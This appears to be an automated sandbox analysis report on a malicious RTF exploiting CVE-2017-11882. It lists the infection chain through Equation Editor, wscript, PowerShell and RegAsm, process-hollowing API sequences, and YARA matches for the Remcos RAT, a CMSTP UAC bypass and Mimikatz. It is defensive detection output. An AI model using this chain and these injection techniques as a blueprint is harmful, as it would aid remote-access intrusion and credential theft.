                  Source: C:\Windows\SysWOW64\wscript.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0041812A GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,8_2_0041812A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0041330D OpenProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,GetFinalPathNameByHandleW,CloseHandle,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle,8_2_0041330D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0041BBC6 OpenProcess,NtResumeProcess,CloseHandle,8_2_0041BBC6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0041BB9A OpenProcess,NtSuspendProcess,CloseHandle,8_2_0041BB9A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,11_2_0040DD85
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00401806 NtdllDefWindowProc_W,11_2_00401806
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_004018C0 NtdllDefWindowProc_W,11_2_004018C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_004016FD NtdllDefWindowProc_A,12_2_004016FD
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_004017B7 NtdllDefWindowProc_A,12_2_004017B7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00402CAC NtdllDefWindowProc_A,14_2_00402CAC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00402D66 NtdllDefWindowProc_A,14_2_00402D66
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004167EF ExitWindowsEx,LoadLibraryA,GetProcAddress,8_2_004167EF
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_002562407_2_00256240
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_002524757_2_00252475
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0043706A8_2_0043706A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004140058_2_00414005
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0043E11C8_2_0043E11C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004541D98_2_004541D9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004381E88_2_004381E8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0041F18B8_2_0041F18B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004462708_2_00446270
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0043E34B8_2_0043E34B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004533AB8_2_004533AB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0042742E8_2_0042742E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004375668_2_00437566
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0043E5A88_2_0043E5A8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004387F08_2_004387F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0043797E8_2_0043797E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004339D78_2_004339D7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0044DA498_2_0044DA49
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00427AD78_2_00427AD7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0041DBF38_2_0041DBF3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00427C408_2_00427C40
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00437DB38_2_00437DB3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00435EEB8_2_00435EEB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0043DEED8_2_0043DEED
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00426E9F8_2_00426E9F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_100171948_2_10017194
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_1000B5C18_2_1000B5C1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0044B04011_2_0044B040
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0043610D11_2_0043610D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0044731011_2_00447310
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0044A49011_2_0044A490
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0040755A11_2_0040755A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0043C56011_2_0043C560
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0044B61011_2_0044B610
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0044D6C011_2_0044D6C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_004476F011_2_004476F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0044B87011_2_0044B870
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0044081D11_2_0044081D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0041495711_2_00414957
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_004079EE11_2_004079EE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00407AEB11_2_00407AEB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0044AA8011_2_0044AA80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00412AA911_2_00412AA9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00404B7411_2_00404B74
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00404B0311_2_00404B03
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0044BBD811_2_0044BBD8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00404BE511_2_00404BE5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00404C7611_2_00404C76
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00415CFE11_2_00415CFE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00416D7211_2_00416D72
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00446D3011_2_00446D30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00446D8B11_2_00446D8B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00406E8F11_2_00406E8F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0040503812_2_00405038
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0041208C12_2_0041208C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_004050A912_2_004050A9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0040511A12_2_0040511A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0043C13A12_2_0043C13A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_004051AB12_2_004051AB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0044930012_2_00449300
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0040D32212_2_0040D322
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0044A4F012_2_0044A4F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0043A5AB12_2_0043A5AB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0041363112_2_00413631
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0044669012_2_00446690
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0044A73012_2_0044A730
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_004398D812_2_004398D8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_004498E012_2_004498E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0044A88612_2_0044A886
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0043DA0912_2_0043DA09
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00438D5E12_2_00438D5E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00449ED012_2_00449ED0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0041FE8312_2_0041FE83
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00430F5412_2_00430F54
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_004050C214_2_004050C2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_004014AB14_2_004014AB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0040513314_2_00405133
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_004051A414_2_004051A4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0040124614_2_00401246
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0040CA4614_2_0040CA46
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0040523514_2_00405235
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_004032C814_2_004032C8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0040168914_2_00401689
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00402F6014_2_00402F60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 004169A7 appears 87 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 004165FF appears 35 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00434801 appears 41 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00422297 appears 42 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00434E70 appears 54 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00402093 appears 50 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 0044DB70 appears 41 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00401E65 appears 35 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00444B5A appears 37 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00413025 appears 79 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00416760 appears 69 times
                  Source: SecuriteInfo.com.Exploit.CVE-2017-11882.123.12187.29198.rtf, type: SAMPLEMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
                  Source: 8.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 8.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 8.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 8.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 8.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 8.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 7.2.powershell.exe.43c2080.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 7.2.powershell.exe.43c2080.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 7.2.powershell.exe.43c2080.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 7.2.powershell.exe.43c2080.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 7.2.powershell.exe.43c2080.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 7.2.powershell.exe.43c2080.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 00000007.00000002.365223710.000000000409D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: Process Memory Space: powershell.exe PID: 3800, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: Process Memory Space: powershell.exe PID: 3900, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: Process Memory Space: powershell.exe PID: 3900, type: MEMORYSTRMatched rule: Invoke_Mimikatz date = 2016-08-03, hash1 = f1a499c23305684b9b1310760b19885a472374a286e2f371596ab66b77f6ab67, author = Florian Roth, description = Detects Invoke-Mimikatz String, reference = https://github.com/clymb3r/PowerShell/tree/master/Invoke-Mimikatz, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: Process Memory Space: powershell.exe PID: 3900, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: Process Memory Space: RegAsm.exe PID: 4008, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: bhv5928.tmp.11.drBinary or memory string: org.slneighbors
                  Source: classification engineClassification label: mal100.phis.troj.spyw.expl.evad.winRTF@19/18@5/4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,??3@YAXPAX@Z,11_2_004182CE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0041798D GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,8_2_0041798D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00410DE1 GetCurrentProcess,GetLastError,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,14_2_00410DE1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,??3@YAXPAX@Z,11_2_00418758
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0040F4AF GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,8_2_0040F4AF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0041B539 FindResourceA,LoadResource,LockResource,SizeofResource,8_2_0041B539
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,8_2_0041AADB
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$curiteInfo.com.Exploit.CVE-2017-11882.123.12187.29198.rtfJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-OT0ZCG
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR7129.tmpJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\escreenthepicturewithbutters.vBS"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................T.r.u.e.(.P..............................+.........................s............................0...............Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ....................................u.e.(.P..............................+.........................s............................................Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSystem information queried: HandleInformationJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: RegAsm.exe, RegAsm.exe, 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                  Source: RegAsm.exe, RegAsm.exe, 0000000C.00000002.387908629.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
